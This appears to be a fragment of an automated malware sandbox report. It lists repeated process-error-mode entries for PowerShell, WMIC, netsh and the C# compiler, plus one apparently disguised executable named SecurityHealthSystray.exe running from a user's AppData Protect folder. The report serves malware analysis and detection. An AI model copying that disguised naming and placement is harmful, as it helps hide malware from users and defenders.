Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
